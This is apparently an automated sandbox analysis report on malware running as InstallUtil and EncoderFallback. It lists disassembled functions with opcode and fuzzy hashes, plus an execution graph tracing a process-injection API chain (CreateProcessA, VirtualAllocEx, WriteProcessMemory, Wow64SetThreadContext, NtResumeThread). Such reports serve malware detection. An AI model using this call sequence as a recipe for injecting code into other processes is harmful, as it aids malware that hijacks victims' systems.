                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 676775d0caa4b9f5c24bc4d9e2a7b3ba0e73c3e419b1fa0341ef4c527f565ec6
                                                                                          • Instruction ID: 21be012eab1d817c56d1561998eee699448962de5668b8172680824805bcf940
                                                                                          • Opcode Fuzzy Hash: 676775d0caa4b9f5c24bc4d9e2a7b3ba0e73c3e419b1fa0341ef4c527f565ec6
                                                                                          • Instruction Fuzzy Hash: D62193786005028FEF21EB7CF88875937A6E755354F108DA5D01ACB255EA74DC849BD2
                                                                                          Function 00B71770 Relevance: .1, Instructions: 68COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 66e361eb6763e2cc25dcc47033253feda1fc99f02545af29451ccde298c15868
                                                                                          • Instruction ID: 3e4e6a5bcce4a21abe5418d6ad62a8f2de30e49f5395d4b91b8a9bec2172c8e6
                                                                                          • Opcode Fuzzy Hash: 66e361eb6763e2cc25dcc47033253feda1fc99f02545af29451ccde298c15868
                                                                                          • Instruction Fuzzy Hash: 46216A75F016818FDB15EB7C98482AEBFF5EB88310F044DA8D999D3300DA349D52CBA1
                                                                                          Function 00B70838 Relevance: .1, Instructions: 63COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1512e2d5ec7c1354b6af95ae0a28264666104d0b5c4c94556152840fd0c6754e
                                                                                          • Instruction ID: 742bab3d3b4e56560267f6f545d9fc4c12801c630b04b15019d12374aa90e227
                                                                                          • Opcode Fuzzy Hash: 1512e2d5ec7c1354b6af95ae0a28264666104d0b5c4c94556152840fd0c6754e
                                                                                          • Instruction Fuzzy Hash: 4911C430A10205CBEF217674D45476A36A1EB56354F24C8FBD46ACB286DA61CD458BD3
                                                                                          Function 00B70848 Relevance: .1, Instructions: 62COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: adca8a68de41e29c32b987f3ee238cf0c807bce695e2d3c44b8dcafff79a96dc
                                                                                          • Instruction ID: 97251a8ed267b95f952b82c5d24725be1953cd30782fd6aae489e9d48230ae27
                                                                                          • Opcode Fuzzy Hash: adca8a68de41e29c32b987f3ee238cf0c807bce695e2d3c44b8dcafff79a96dc
                                                                                          • Instruction Fuzzy Hash: 8D119430B10209CBEF14BB79C45476A32D5FB56354F24C8BBD12ACF285DA61DC459BD2
                                                                                          Function 00B7143B Relevance: .1, Instructions: 57COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cce4ca91867d0ac518f8cb48b7a513d94e331d0c2e902991829ed9a7b997c82a
                                                                                          • Instruction ID: ae510d85056fbf79570a192aa6d26984b00a07aba784eb1669c66b1c1f666f5c
                                                                                          • Opcode Fuzzy Hash: cce4ca91867d0ac518f8cb48b7a513d94e331d0c2e902991829ed9a7b997c82a
                                                                                          • Instruction Fuzzy Hash: B8113032E102158FCB25EFBC84911AD7BF5EF48314B2489BAD41DD7341E635DC418BA1
                                                                                          Function 0095D4D3 Relevance: .1, Instructions: 56COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2752079108.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_95d000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                                                          • Instruction ID: 523c4cc06697e6bde2cb401c692e50b041fae5ae2722403d956ce1f29b93bc4a
                                                                                          • Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                                                          • Instruction Fuzzy Hash: B111D376504240DFDB16CF10D5C4B16BF71FB94315F24C6A9EC090B25AC33AD85ACBA2
                                                                                          Function 00AAD03F Relevance: .1, Instructions: 53COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753098880.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_aad000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
                                                                                          • Instruction ID: a8c54d79d1a0be1f5923eced0b3a4e3eaf28a6056edb1c1b0ce860a5c73c2178
                                                                                          • Opcode Fuzzy Hash: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
                                                                                          • Instruction Fuzzy Hash: A9118B75504284DFCB15CF10D9C4B15BBA2FB89314F24C6ADE88A4B696C33AD84ACF62
                                                                                          Function 00B71448 Relevance: .1, Instructions: 53COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e11e9996caa72fac02a7c6759244d15833fd5dd01ae49d4f7fc6d153282fc7e6
                                                                                          • Instruction ID: e78ed6bcf765cfa724a610eca5794a0a2e622dc5a427151d951a1ecad14df7d3
                                                                                          • Opcode Fuzzy Hash: e11e9996caa72fac02a7c6759244d15833fd5dd01ae49d4f7fc6d153282fc7e6
                                                                                          • Instruction Fuzzy Hash: 45012D31E102159BCB21EFBD84511AD7BF5EF48314B2488BAD419EB341E635DD418BA5
                                                                                          Function 00B77E60 Relevance: .0, Instructions: 48COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5b9a6d2c0c10faa9ccd5d6f95e78104ac1c470805db7f7df581da1898467df30
                                                                                          • Instruction ID: 27237e9b9b5b49a4dce9ad91bb9460697e183e0bfb00295f5fb8fc14bfba9c2e
                                                                                          • Opcode Fuzzy Hash: 5b9a6d2c0c10faa9ccd5d6f95e78104ac1c470805db7f7df581da1898467df30
                                                                                          • Instruction Fuzzy Hash: 72111838A44155CFC758DBB8E948A5D7BF2EF89315B2444D8E4068B7B5CF309D92CB41
                                                                                          Function 00B7A6B0 Relevance: .0, Instructions: 47COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6a75c5b7f1dd6229af9a0b4db9c79ef6c24e272c2ebca4333143cb88bef53fd0
                                                                                          • Instruction ID: e201fe9f9bd269d48f1036ac33b18631e834e7c7608eceb320b5cb08dfe87979
                                                                                          • Opcode Fuzzy Hash: 6a75c5b7f1dd6229af9a0b4db9c79ef6c24e272c2ebca4333143cb88bef53fd0
                                                                                          • Instruction Fuzzy Hash: B301D231A002048BDB44EF65D94579EBBB5EF84301F64C264C90C5F29AE7709E05CBA1
                                                                                          Function 00B78F01 Relevance: .0, Instructions: 36COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f34db3d313df0fecacf670083bbd91a873c5414427355d476f8e46fcbca9aa7a
                                                                                          • Instruction ID: ebf9fb69937fe554c1565ef2ea1142db51218796a6c324209ec3eef9a2f3694f
                                                                                          • Opcode Fuzzy Hash: f34db3d313df0fecacf670083bbd91a873c5414427355d476f8e46fcbca9aa7a
                                                                                          • Instruction Fuzzy Hash: 120188305042CADFDB07EBB8F89169D7BB1EF82340F1045ECC4414B196EE716A06D782
                                                                                          Function 00B78F10 Relevance: .0, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a3f9a729b0dcfe7177273cdaec3fa6a81ea0175170c2a5dea8c6f6f4afc93b0f
                                                                                          • Instruction ID: 6c36905ea4298880ae9dc39e20787a8bfd26ee2253c9933c883ffa2b47017124
                                                                                          • Opcode Fuzzy Hash: a3f9a729b0dcfe7177273cdaec3fa6a81ea0175170c2a5dea8c6f6f4afc93b0f
                                                                                          • Instruction Fuzzy Hash: CFF03C30A1024EDFDB06FBB8F89169DBBB2EB85340F5045A8C5049B254EE706E059B92
                                                                                          Function 00B77EE1 Relevance: .0, Instructions: 10COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 98b9e97b2a7c2b76746953ed3310fe735421b4f0c7bf1186913bee7e0fb1e3d7
                                                                                          • Instruction ID: b66ce87d457690fa59723073062fd579c085be515971b073e2a9bb153a2b0285
                                                                                          • Opcode Fuzzy Hash: 98b9e97b2a7c2b76746953ed3310fe735421b4f0c7bf1186913bee7e0fb1e3d7
                                                                                          • Instruction Fuzzy Hash: 12C08029544144C5C75442D87C043DC3B64C781325F1004D5D11841C50477009F98691

                                                                                          Execution Graph

                                                                                          Execution Coverage:6.9%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:5.3%
                                                                                          Total number of Nodes:171
                                                                                          Total number of Limit Nodes:5
                                                                                          execution_graph 26317 5d38aa0 26318 5d38ab5 26317->26318 26322 5d32110 26318->26322 26326 5d32108 26318->26326 26319 5d38ad0 26323 5d32150 SleepEx 26322->26323 26325 5d3218e 26323->26325 26325->26319 26327 5d32110 SleepEx 26326->26327 26329 5d3218e 26327->26329 26329->26319 26104 5d207c8 26105 5d207dd 26104->26105 26107 5d207f3 26105->26107 26108 5d20a77 26105->26108 26109 5d20865 26108->26109 26110 5d20c26 26108->26110 26109->26107 26114 5d22181 26110->26114 26118 5d22190 26110->26118 26122 5d21bdf 26110->26122 26115 5d22190 26114->26115 26126 5d226ff 26115->26126 26119 5d221a5 26118->26119 26121 5d226ff 10 API calls 26119->26121 26120 5d221c7 26120->26109 26121->26120 26123 5d221b6 26122->26123 26125 5d226ff 10 API calls 26123->26125 26124 5d221c7 26124->26109 26125->26124 26127 5d22731 26126->26127 26128 5d221c7 26126->26128 26131 5d22a4b 26127->26131 26144 5d22a58 26127->26144 26128->26109 26132 5d22a58 26131->26132 26157 5d23023 26132->26157 26162 5d2349f 26132->26162 26166 5d22e9e 26132->26166 26171 5d23969 26132->26171 26176 5d23ba9 26132->26176 26181 5d22e0a 26132->26181 26186 5d238a7 26132->26186 26191 5d22f11 26132->26191 26196 5d23700 26132->26196 26201 5d236e3 26132->26201 26133 5d22a8f 26133->26128 26145 5d22a6d 26144->26145 26147 5d23023 2 API calls 26145->26147 26148 5d236e3 2 API calls 26145->26148 26149 5d23700 2 API calls 26145->26149 26150 5d22f11 2 API calls 26145->26150 26151 5d238a7 2 API calls 26145->26151 26152 5d22e0a 2 API calls 26145->26152 26153 5d23ba9 2 API calls 26145->26153 26154 5d23969 2 API calls 26145->26154 26155 5d22e9e 2 API calls 26145->26155 26156 5d2349f 2 API calls 26145->26156 26146 5d22a8f 26146->26128 26147->26146 26148->26146 26149->26146 26150->26146 26151->26146 26152->26146 26153->26146 26154->26146 26155->26146 26156->26146 26158 5d23029 26157->26158 26206 5d36d30 26158->26206 26210 5d36d29 26158->26210 26159 5d230a1 26159->26133 26214 5d25dd0 26162->26214 26219 5d25dc1 26162->26219 26163 5d234b7 26167 5d22eb6 26166->26167 26232 5d24138 26167->26232 26238 5d24128 26167->26238 26168 5d22ece 26172 5d23b42 26171->26172 26173 5d22bd2 26171->26173 26267 5d25b10 26172->26267 26273 5d25b20 26172->26273 26177 5d23bb3 26176->26177 26278 5d36ee0 26177->26278 26282 5d36ed8 26177->26282 26178 5d23bea 26182 5d22e14 26181->26182 26183 5d22f1b 26182->26183 26286 5d36c30 26182->26286 26290 5d36c28 26182->26290 26187 5d238c9 26186->26187 26189 5d36d30 WriteProcessMemory 26187->26189 26190 5d36d29 WriteProcessMemory 26187->26190 26188 5d23929 26188->26133 26189->26188 26190->26188 26192 5d22e30 26191->26192 26193 5d22f1b 26191->26193 26192->26191 26194 5d36c30 VirtualAllocEx 26192->26194 26195 5d36c28 VirtualAllocEx 26192->26195 26194->26192 26195->26192 26197 5d23722 26196->26197 26199 5d36d30 WriteProcessMemory 26197->26199 26200 5d36d29 WriteProcessMemory 26197->26200 26198 5d231a1 26198->26133 26199->26198 26200->26198 26202 5d236f0 26201->26202 26204 5d36ee0 NtResumeThread 26202->26204 26205 5d36ed8 NtResumeThread 26202->26205 26203 5d23bea 26204->26203 26205->26203 26207 5d36d78 WriteProcessMemory 26206->26207 26209 5d36dcf 26207->26209 26209->26159 26211 5d36d30 WriteProcessMemory 26210->26211 26213 5d36dcf 26211->26213 26213->26159 26215 5d25de5 26214->26215 26224 5d36810 26215->26224 26228 5d36808 26215->26228 26216 5d25dfe 26216->26163 26220 5d25dd0 26219->26220 26222 5d36810 Wow64SetThreadContext 26220->26222 26223 5d36808 Wow64SetThreadContext 26220->26223 26221 5d25dfe 26221->26163 26222->26221 26223->26221 26225 5d36855 Wow64SetThreadContext 26224->26225 26227 5d3689d 26225->26227 26227->26216 26229 5d36810 Wow64SetThreadContext 26228->26229 26231 5d3689d 26229->26231 26231->26216 26233 5d2414f 26232->26233 26234 5d24171 26233->26234 26244 5d24540 26233->26244 26249 5d24a6d 26233->26249 26254 5d244c7 26233->26254 26234->26168 26239 5d2412f 26238->26239 26239->26239 26240 5d24171 26239->26240 26241 5d24540 2 API calls 26239->26241 26242 5d244c7 2 API calls 26239->26242 26243 5d24a6d 2 API calls 26239->26243 26240->26168 26241->26240 26242->26240 26243->26240 26245 5d24568 26244->26245 26259 5d36510 26245->26259 26263 5d36505 26245->26263 26250 5d24a74 26249->26250 26251 5d24aaa 26250->26251 26252 5d36510 CreateProcessA 26250->26252 26253 5d36505 CreateProcessA 26250->26253 26252->26251 26253->26251 26255 5d244d6 26254->26255 26257 5d36510 CreateProcessA 26255->26257 26258 5d36505 CreateProcessA 26255->26258 26256 5d24aaa 26257->26256 26258->26256 26260 5d36574 CreateProcessA 26259->26260 26262 5d366fc 26260->26262 26264 5d36510 CreateProcessA 26263->26264 26266 5d366fc 26264->26266 26268 5d25ae8 26267->26268 26269 5d25b1e 26267->26269 26268->26173 26271 5d36810 Wow64SetThreadContext 26269->26271 26272 5d36808 Wow64SetThreadContext 26269->26272 26270 5d25b4e 26270->26173 26271->26270 26272->26270 26274 5d25b35 26273->26274 26276 5d36810 Wow64SetThreadContext 26274->26276 26277 5d36808 Wow64SetThreadContext 26274->26277 26275 5d25b4e 26275->26173 26276->26275 26277->26275 26279 5d36f28 NtResumeThread 26278->26279 26281 5d36f5d 26279->26281 26281->26178 26283 5d36ee0 NtResumeThread 26282->26283 26285 5d36f5d 26283->26285 26285->26178 26287 5d36c70 VirtualAllocEx 26286->26287 26289 5d36cad 26287->26289 26289->26182 26291 5d36c30 VirtualAllocEx 26290->26291 26293 5d36cad 26291->26293 26293->26182 26294 5d38c88 26295 5d38c9d 26294->26295 26299 5d38ed0 26295->26299 26304 5d38dcd 26295->26304 26296 5d38cb3 26300 5d38ed6 26299->26300 26301 5d38ee5 26300->26301 26309 5d37120 26300->26309 26313 5d37118 26300->26313 26301->26296 26306 5d38df4 26304->26306 26305 5d38ee5 26305->26296 26306->26305 26307 5d37120 VirtualProtect 26306->26307 26308 5d37118 VirtualProtect 26306->26308 26307->26306 26308->26306 26310 5d37168 VirtualProtect 26309->26310 26312 5d371a3 26310->26312 26312->26300 26314 5d37120 VirtualProtect 26313->26314 26316 5d371a3 26314->26316 26316->26300 26330 5d35ea8 26331 5d35ef6 NtProtectVirtualMemory 26330->26331 26333 5d35f40 26331->26333

                                                                                          Executed Functions

                                                                                          Function 0123CEA0 Relevance: 2.2, Strings: 1, Instructions: 983COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 9 123cea0-123cec1 10 123cec3 9->10 11 123cec8-123cfaf 9->11 10->11 13 123d6b1-123d6d9 11->13 14 123cfb5-123d0f6 call 12396b8 11->14 17 123dddf-123dde8 13->17 60 123d67a-123d6a4 14->60 61 123d0fc-123d157 14->61 19 123d6e7-123d6f1 17->19 20 123ddee-123de05 17->20 21 123d6f3 19->21 22 123d6f8-123d7ec call 12396b8 19->22 21->22 43 123d816 22->43 44 123d7ee-123d7fa 22->44 45 123d81c-123d83c 43->45 46 123d804-123d80a 44->46 47 123d7fc-123d802 44->47 51 123d83e-123d897 45->51 52 123d89c-123d91c 45->52 49 123d814 46->49 47->49 49->45 66 123dddc 51->66 74 123d973-123d9b6 call 12396b8 52->74 75 123d91e-123d971 52->75 71 123d6a6 60->71 72 123d6ae 60->72 68 123d159 61->68 69 123d15c-123d167 61->69 66->17 68->69 73 123d58f-123d595 69->73 71->72 72->13 76 123d59b-123d617 call 12319e4 73->76 77 123d16c-123d18a 73->77 99 123d9c1-123d9ca 74->99 75->99 119 123d664-123d66a 76->119 79 123d1e1-123d1f6 77->79 80 123d18c-123d190 77->80 83 123d1f8 79->83 84 123d1fd-123d213 79->84 80->79 85 123d192-123d19d 80->85 83->84 88 123d215 84->88 89 123d21a-123d231 84->89 90 123d1d3-123d1d9 85->90 88->89 93 123d233 89->93 94 123d238-123d24e 89->94 95 123d1db-123d1dc 90->95 96 123d19f-123d1a3 90->96 93->94 102 123d250 94->102 103 123d255-123d25c 94->103 98 123d25f-123d2ca 95->98 100 123d1a5 96->100 101 123d1a9-123d1c1 96->101 109 123d2de-123d493 98->109 110 123d2cc-123d2d8 98->110 106 123da2a-123da39 99->106 100->101 107 123d1c3 101->107 108 123d1c8-123d1d0 101->108 102->103 103->98 111 123da3b-123dac3 106->111 112 123d9cc-123d9f4 106->112 107->108 108->90 117 123d4f7-123d50c 109->117 118 123d495-123d499 109->118 110->109 147 123dc3c-123dc48 111->147 115 123d9f6 112->115 116 123d9fb-123da24 112->116 115->116 116->106 125 123d513-123d534 117->125 126 123d50e 117->126 118->117 121 123d49b-123d4aa 118->121 123 123d619-123d661 119->123 124 123d66c-123d672 119->124 130 123d4e9-123d4ef 121->130 123->119 124->60 127 123d536 125->127 128 123d53b-123d55a 125->128 126->125 127->128 131 123d561-123d581 128->131 132 123d55c 128->132 134 123d4f1-123d4f2 130->134 135 123d4ac-123d4b0 130->135 140 123d583 131->140 141 123d588 131->141 132->131 142 123d58c 134->142 138 123d4b2-123d4b6 135->138 139 123d4ba-123d4db 135->139 138->139 143 123d4e2-123d4e6 139->143 144 123d4dd 139->144 140->141 141->142 142->73 143->130 144->143 149 123dac8-123dad1 147->149 150 123dc4e-123dca9 147->150 151 123dad3 149->151 152 123dada-123dc30 149->152 165 123dce0-123dd0a 150->165 166 123dcab-123dcde 150->166 151->152 154 123dae0-123db20 151->154 155 123db25-123db65 151->155 156 123db6a-123dbaa 151->156 157 123dbaf-123dbef 151->157 167 123dc36 152->167 154->167 155->167 156->167 157->167 174 123dd13-123dda6 165->174 166->174 167->147 178 123ddad-123ddcd 174->178 178->66
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2753371991.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1230000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Ehq"
                                                                                          • API String ID: 0-672064728
                                                                                          • Opcode ID: d4fe9540319ead33d86f870dde57455d7ebad4959734859a6e68ac5ad084a56f
                                                                                          • Instruction ID: fcebac68044e91f586b9dc07e01e86f37e0dad5f4a0208e634b10fb61e0d6f57
                                                                                          • Opcode Fuzzy Hash: d4fe9540319ead33d86f870dde57455d7ebad4959734859a6e68ac5ad084a56f
                                                                                          • Instruction Fuzzy Hash: 5EA2A375A10228CFDB65CF69C984AD9BBB2FF89304F1581E9D509AB325DB319E81CF40
                                                                                          Function 05D35EA0 Relevance: 1.6, APIs: 1, Instructions: 65nativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 419 5d35ea0-5d35f3e NtProtectVirtualMemory 422 5d35f40-5d35f46 419->422 423 5d35f47-5d35f6c 419->423 422->423
                                                                                          APIs
                                                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05D35F31
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 2706961497-0
                                                                                          • Opcode ID: 5b23132e0923e245e19344d09d829322c5ad23ff56a236df80821882bd201507
                                                                                          • Instruction ID: 7e0bbcc8936156e1f3f3dea6158ad88a39a44e79b71a212ee46357c87893dd0a
                                                                                          • Opcode Fuzzy Hash: 5b23132e0923e245e19344d09d829322c5ad23ff56a236df80821882bd201507
                                                                                          • Instruction Fuzzy Hash: D02102B5D01349DFDB10CFAAD980A9EFBF4BF48310F24842AE519A7240C7759910CBA5
                                                                                          Function 05D35EA8 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 427 5d35ea8-5d35f3e NtProtectVirtualMemory 430 5d35f40-5d35f46 427->430 431 5d35f47-5d35f6c 427->431 430->431
                                                                                          APIs
                                                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05D35F31
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 2706961497-0
                                                                                          • Opcode ID: 8fe7428641b6e8100eaba892824f58ff7bca38be38f001279f5f4771d54f5ffc
                                                                                          • Instruction ID: aa5830f2d095ddf6965b8c3668ea7edc31b9b379026739556ac60e6849fe2e5b
                                                                                          • Opcode Fuzzy Hash: 8fe7428641b6e8100eaba892824f58ff7bca38be38f001279f5f4771d54f5ffc
                                                                                          • Instruction Fuzzy Hash: B621E3B1D013499FDB10DFAAD981ADEFBF5FF48310F20842AE519A7250C7799900CBA5
                                                                                          Function 05D36ED8 Relevance: 1.6, APIs: 1, Instructions: 56nativethreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • NtResumeThread.NTDLL(?,?), ref: 05D36F4E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          • Opcode ID: d73986f91fe08b037209cce553aad1cb996a53f93e636c0f1ef086e6d14fb74b
                                                                                          • Instruction ID: 09327388ae859a039a847e91ce20c53cd793d1d1bb69ee6740a350d897c90ca8
                                                                                          • Opcode Fuzzy Hash: d73986f91fe08b037209cce553aad1cb996a53f93e636c0f1ef086e6d14fb74b
                                                                                          • Instruction Fuzzy Hash: 091147B0D043499FDB10DFAAC481B9EFBF4FF88214F14842AD519A7240C778A904CFA5
                                                                                          Function 05D36EE0 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • NtResumeThread.NTDLL(?,?), ref: 05D36F4E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          • Opcode ID: 22034192c73a3c89fd9bd33096db715aaca6ac3d45dc0805f55df1a4dc522943
                                                                                          • Instruction ID: a8fa65b03762aca0cc685daea3a4ca5685b163237e283ecba776bb5e7d43b1bf
                                                                                          • Opcode Fuzzy Hash: 22034192c73a3c89fd9bd33096db715aaca6ac3d45dc0805f55df1a4dc522943
                                                                                          • Instruction Fuzzy Hash: 3E1114B1D043499FDB10DFAAC485B9EFBF4BF88214F10842AD519A7240CB78A904CFA5
                                                                                          Function 0123E630 Relevance: .7, Instructions: 680COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2753371991.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1230000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: dbada1cc526269fef4eaa91b4b96f1d2dc182ee2702ef4f8fc269573cc7a570f
                                                                                          • Instruction ID: 68f55b192e2e9b72a9c922638f07e2344dabc6e0799ff83ef4cecfd683cf2432
                                                                                          • Opcode Fuzzy Hash: dbada1cc526269fef4eaa91b4b96f1d2dc182ee2702ef4f8fc269573cc7a570f
                                                                                          • Instruction Fuzzy Hash: EC426974B10209CFDB15DF29C494A6A7BF6BFC9310B1284A9E606CB3A5DB31EC46CB51
